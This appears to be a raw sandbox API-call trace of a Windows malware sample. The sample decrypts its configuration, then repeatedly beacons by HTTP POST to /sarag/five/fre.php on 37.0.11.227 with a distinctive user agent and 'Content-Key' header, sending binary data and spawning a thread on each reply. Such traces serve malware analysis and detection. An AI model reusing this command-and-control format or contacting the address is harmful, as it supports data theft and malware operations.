[0251.154] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0251.154] GetProcessHeap () returned 0x690000 [0251.154] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0251.155] GetProcessHeap () returned 0x690000 [0251.155] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0251.155] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0251.156] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0251.156] GetProcessHeap () returned 0x690000 [0251.156] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0251.156] GetProcessHeap () returned 0x690000 [0251.156] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0251.157] GetProcessHeap () returned 0x690000 [0251.157] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0251.157] GetProcessHeap () returned 0x690000 [0251.157] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0251.157] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0251.158] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0251.158] GetProcessHeap () returned 0x690000 [0251.158] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0251.158] GetProcessHeap () returned 0x690000 [0251.159] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0251.159] send (s=0x6fc, buf=0x6ad508*, len=242, flags=0) returned 242 [0251.159] send (s=0x6fc, buf=0x6aba40*, len=159, flags=0) returned 159 [0251.159] GetProcessHeap () returned 0x690000 [0251.159] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0251.159] recv (in: s=0x6fc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0251.230] GetProcessHeap () returned 0x690000 [0251.231] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0251.231] GetProcessHeap () returned 0x690000 [0251.231] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0251.232] GetProcessHeap () returned 0x690000 [0251.232] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0251.232] GetProcessHeap () returned 0x690000 [0251.232] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0251.232] closesocket (s=0x6fc) returned 0 [0251.233] GetProcessHeap () returned 0x690000 [0251.233] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0251.233] GetProcessHeap () returned 0x690000 [0251.233] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0251.233] GetProcessHeap () returned 0x690000 [0251.233] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0251.233] GetProcessHeap () returned 0x690000 [0251.234] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0251.234] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1464) returned 0x6fc [0251.235] Sleep (dwMilliseconds=0xea60) [0251.239] GetProcessHeap () returned 0x690000 [0251.239] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0251.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.240] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0251.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.244] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0251.250] GetProcessHeap () returned 0x690000 [0251.250] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0251.250] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.251] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0251.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.252] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0251.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.253] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0251.253] GetProcessHeap () returned 0x690000 [0251.253] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0251.254] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.254] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0251.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.255] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0251.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.256] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0251.256] GetProcessHeap () returned 0x690000 [0251.256] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0251.257] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.257] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0251.258] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.258] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0251.259] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.259] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0251.260] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.260] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0251.260] GetProcessHeap () returned 0x690000 [0251.260] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0251.260] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0251.260] GetProcessHeap () returned 0x690000 [0251.261] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0251.261] GetProcessHeap () returned 0x690000 [0251.261] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0251.261] GetProcessHeap () returned 0x690000 [0251.261] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0251.261] GetProcessHeap () returned 0x690000 [0251.261] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0251.262] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.262] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0251.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.266] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0251.271] GetProcessHeap () returned 0x690000 [0251.271] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0251.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.272] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0251.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.273] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0251.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.274] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0251.274] GetProcessHeap () returned 0x690000 [0251.274] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0251.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.276] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0251.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.277] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0251.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.278] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0251.278] GetProcessHeap () returned 0x690000 [0251.278] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0251.278] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.279] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0251.279] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.280] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0251.280] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.280] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0251.281] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.281] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0251.281] GetProcessHeap () returned 0x690000 [0251.281] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0251.281] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0251.281] GetProcessHeap () returned 0x690000 [0251.281] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab390 [0251.281] socket (af=2, type=1, protocol=6) returned 0x700 [0251.282] connect (s=0x700, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0251.313] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0251.313] GetProcessHeap () returned 0x690000 [0251.313] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0251.313] GetProcessHeap () returned 0x690000 [0251.313] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0251.313] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0251.314] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0251.314] GetProcessHeap () returned 0x690000 [0251.314] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0251.314] GetProcessHeap () returned 0x690000 [0251.315] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0251.315] GetProcessHeap () returned 0x690000 [0251.315] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0251.315] GetProcessHeap () returned 0x690000 [0251.315] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0251.316] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0251.316] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0251.317] GetProcessHeap () returned 0x690000 [0251.317] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0251.317] GetProcessHeap () returned 0x690000 [0251.317] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0251.317] send (s=0x700, buf=0x6ad508*, len=242, flags=0) returned 242 [0251.319] send (s=0x700, buf=0x6aba40*, len=159, flags=0) returned 159 [0251.319] GetProcessHeap () returned 0x690000 [0251.319] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0251.319] recv (in: s=0x700, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0251.395] GetProcessHeap () returned 0x690000 [0251.395] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0251.396] GetProcessHeap () returned 0x690000 [0251.396] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0251.396] GetProcessHeap () returned 0x690000 [0251.396] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0251.397] GetProcessHeap () returned 0x690000 [0251.397] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0251.397] closesocket (s=0x700) returned 0 [0251.397] GetProcessHeap () returned 0x690000 [0251.397] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab390 | out: hHeap=0x690000) returned 1 [0251.397] GetProcessHeap () returned 0x690000 [0251.398] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0251.398] GetProcessHeap () returned 0x690000 [0251.398] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0251.398] GetProcessHeap () returned 0x690000 [0251.398] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0251.399] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1468) returned 0x700 [0251.400] Sleep (dwMilliseconds=0xea60) [0251.401] GetProcessHeap () returned 0x690000 [0251.401] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0251.402] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.402] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0251.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.407] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0251.411] GetProcessHeap () returned 0x690000 [0251.411] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0251.412] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.412] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0251.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.414] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0251.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.415] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0251.415] GetProcessHeap () returned 0x690000 [0251.415] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0251.420] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.420] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0251.421] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.421] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0251.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.422] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0251.422] GetProcessHeap () returned 0x690000 [0251.422] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0251.423] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.423] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0251.424] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.424] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0251.425] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.425] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0251.426] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.426] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0251.426] GetProcessHeap () returned 0x690000 [0251.426] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0251.426] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0251.426] GetProcessHeap () returned 0x690000 [0251.427] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0251.427] GetProcessHeap () returned 0x690000 [0251.427] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0251.427] GetProcessHeap () returned 0x690000 [0251.427] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0251.427] GetProcessHeap () returned 0x690000 [0251.427] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0251.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.428] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0251.433] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.434] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0251.438] GetProcessHeap () returned 0x690000 [0251.438] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0251.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.439] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0251.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.440] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0251.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.441] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0251.441] GetProcessHeap () returned 0x690000 [0251.441] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0251.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.442] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0251.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.443] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0251.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.444] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0251.444] GetProcessHeap () returned 0x690000 [0251.444] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0251.444] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.445] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0251.445] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.446] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0251.446] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.446] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0251.447] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.447] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0251.447] GetProcessHeap () returned 0x690000 [0251.447] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0251.447] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0251.447] GetProcessHeap () returned 0x690000 [0251.447] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab380 [0251.447] socket (af=2, type=1, protocol=6) returned 0x704 [0251.448] connect (s=0x704, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0251.472] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0251.472] GetProcessHeap () returned 0x690000 [0251.472] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0251.472] GetProcessHeap () returned 0x690000 [0251.472] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0251.472] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0251.473] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0251.473] GetProcessHeap () returned 0x690000 [0251.473] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af680 [0251.473] GetProcessHeap () returned 0x690000 [0251.474] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0251.474] 